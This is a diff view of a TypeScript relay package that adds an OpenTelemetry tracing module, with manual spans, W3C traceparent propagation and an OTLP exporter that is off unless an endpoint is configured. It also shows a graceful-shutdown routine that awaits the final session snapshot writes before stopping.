|
|
523
|
+
|
|
524
|
+
const port = server.port ?? 0;
|
|
525
|
+
return {
|
|
526
|
+
port,
|
|
527
|
+
baseUrl: opts.publicBaseUrl?.replace(/\/$/, "") ?? `http://${opts.hostname ?? "0.0.0.0"}:${port}`,
|
|
528
|
+
sessions,
|
|
529
|
+
stats: () => ({ snapshotFailures }),
|
|
530
|
+
async stop() {
|
|
531
|
+
const active = [...sessions.values()];
|
|
532
|
+
// Flush every active session's final snapshot and AWAIT the writes before
|
|
533
|
+
// tearing down. The old path fired `dropSession` (un-awaited persist) then
|
|
534
|
+
// returned, so a SIGTERM + process.exit raced the S3 PUTs and lost the last
|
|
535
|
+
// interval's state. Now a graceful shutdown is lossless (ADR 0071 §5).
|
|
536
|
+
await Promise.allSettled(active.map((s) => persist(s)));
|
|
537
|
+
for (const s of active) {
|
|
538
|
+
if (s.ttl) clearTimeout(s.ttl);
|
|
539
|
+
if (s.snap) clearInterval(s.snap);
|
|
540
|
+
sessions.delete(s.id);
|
|
541
|
+
s.hub.destroy();
|
|
542
|
+
}
|
|
543
|
+
server.stop(true);
|
|
544
|
+
},
|
|
545
|
+
};
|
|
546
|
+
}
|
package/src/tracing.ts
ADDED
|
@@ -0,0 +1,86 @@
|
|
|
1
|
+
import { trace, context, propagation, SpanStatusCode, SpanKind, type Span, type Context } from "@opentelemetry/api";
|
|
2
|
+
import { BasicTracerProvider, BatchSpanProcessor } from "@opentelemetry/sdk-trace-base";
|
|
3
|
+
|
|
4
|
+
// Re-export so call sites set span kind via the tracing module (centralized OTel access).
|
|
5
|
+
export { SpanKind };
|
|
6
|
+
import { OTLPTraceExporter } from "@opentelemetry/exporter-trace-otlp-http";
|
|
7
|
+
import { resourceFromAttributes } from "@opentelemetry/resources";
|
|
8
|
+
import { ATTR_SERVICE_NAME, ATTR_SERVICE_VERSION } from "@opentelemetry/semantic-conventions";
|
|
9
|
+
import { AsyncLocalStorageContextManager } from "@opentelemetry/context-async-hooks";
|
|
10
|
+
import { W3CTraceContextPropagator } from "@opentelemetry/core";
|
|
11
|
+
|
|
12
|
+
// OTLP tracing for the relay (ADR 0073 step 3b / ticket 0024). MANUAL spans + W3C
|
|
13
|
+
// `traceparent` propagation, not auto-instrumentation (require-in-the-middle is unreliable
|
|
14
|
+
// under Bun; the propagator + AsyncLocalStorage context API work, verified). **Gated**: a no-op
|
|
15
|
+
// unless OTEL_EXPORTER_OTLP_ENDPOINT is set, so the services run identically with tracing off, // every helper below degrades to a safe no-op (the API's default no-op tracer/propagator).
|
|
16
|
+
//
|
|
17
|
+
// Duplicated in packages/present-relay/src/tracing.ts (present-relay is OSS-published; a shared
|
|
18
|
+
// package would force the five-place OSS lock-step).
|
|
19
|
+
|
|
20
|
+
let started = false;
|
|
21
|
+
|
|
22
|
+
/** Initialise the global tracer once. Call at process start. No-op without the OTLP endpoint. */
|
|
23
|
+
export function initTracing(serviceName: string): void {
|
|
24
|
+
if (started) return;
|
|
25
|
+
const endpoint = process.env.OTEL_EXPORTER_OTLP_ENDPOINT;
|
|
26
|
+
if (!endpoint) return;
|
|
27
|
+
started = true;
|
|
28
|
+
const provider = new BasicTracerProvider({
|
|
29
|
+
resource: resourceFromAttributes({
|
|
30
|
+
[ATTR_SERVICE_NAME]: serviceName,
|
|
31
|
+
[ATTR_SERVICE_VERSION]: process.env.PRESENT_RELAY_VERSION ?? "unknown",
|
|
32
|
+
}),
|
|
33
|
+
spanProcessors: [new BatchSpanProcessor(new OTLPTraceExporter({ url: `${endpoint.replace(/\/$/, "")}/v1/traces` }))],
|
|
34
|
+
});
|
|
35
|
+
trace.setGlobalTracerProvider(provider);
|
|
36
|
+
context.setGlobalContextManager(new AsyncLocalStorageContextManager().enable());
|
|
37
|
+
propagation.setGlobalPropagator(new W3CTraceContextPropagator());
|
|
38
|
+
}
|
|
39
|
+
|
|
40
|
+
const tracer = () => trace.getTracer("liebstoeckel");
|
|
41
|
+
|
|
42
|
+
/** Parent context extracted from incoming request headers (W3C traceparent). */
|
|
43
|
+
export function ctxFromHeaders(headers: Headers): Context {
|
|
44
|
+
const carrier: Record<string, string> = {};
|
|
45
|
+
headers.forEach((v, k) => {
|
|
46
|
+
carrier[k] = v;
|
|
47
|
+
});
|
|
48
|
+
return propagation.extract(context.active(), carrier);
|
|
49
|
+
}
|
|
50
|
+
|
|
51
|
+
/** Inject the active trace context into outbound headers for downstream propagation. */
|
|
52
|
+
export function injectHeaders(h: Record<string, string> = {}): Record<string, string> {
|
|
53
|
+
propagation.inject(context.active(), h);
|
|
54
|
+
return h;
|
|
55
|
+
}
|
|
56
|
+
|
|
57
|
+
/** The active trace id (for stamping into structured logs), or undefined when off/unsampled. */
|
|
58
|
+
export function activeTraceId(): string | undefined {
|
|
59
|
+
const sc = trace.getSpanContext(context.active());
|
|
60
|
+
return sc && sc.traceId !== "00000000000000000000000000000000" ? sc.traceId : undefined;
|
|
61
|
+
}
|
|
62
|
+
|
|
63
|
+
/** Run `fn` inside a span (child of `parent` if given, else the active context), recording
|
|
64
|
+
* errors. Safe no-op semantics when tracing is off (non-recording span, fn still runs). */
|
|
65
|
+
export async function withSpan<T>(
|
|
66
|
+
name: string,
|
|
67
|
+
parent: Context | undefined,
|
|
68
|
+
attrs: Record<string, string | number | boolean>,
|
|
69
|
+
fn: (span: Span) => Promise<T> | T,
|
|
70
|
+
// Default INTERNAL; set SERVER on ingress handlers and CLIENT on outbound calls so the
|
|
71
|
+
// service graph + Traces-Drilldown "structure" view can build the trace hierarchy (those
|
|
72
|
+
// views key off SERVER spans with CLIENT edges, INTERNAL-only traces show no structure).
|
|
73
|
+
kind: SpanKind = SpanKind.INTERNAL,
|
|
74
|
+
): Promise<T> {
|
|
75
|
+
const base = parent ?? context.active();
|
|
76
|
+
const span = tracer().startSpan(name, { kind, attributes: attrs }, base);
|
|
77
|
+
try {
|
|
78
|
+
return await context.with(trace.setSpan(base, span), () => fn(span));
|
|
79
|
+
} catch (e) {
|
|
80
|
+
span.recordException(e as Error);
|
|
81
|
+
span.setStatus({ code: SpanStatusCode.ERROR, message: String(e) });
|
|
82
|
+
throw e;
|
|
83
|
+
} finally {
|
|
84
|
+
span.end();
|
|
85
|
+
}
|
|
86
|
+
}
|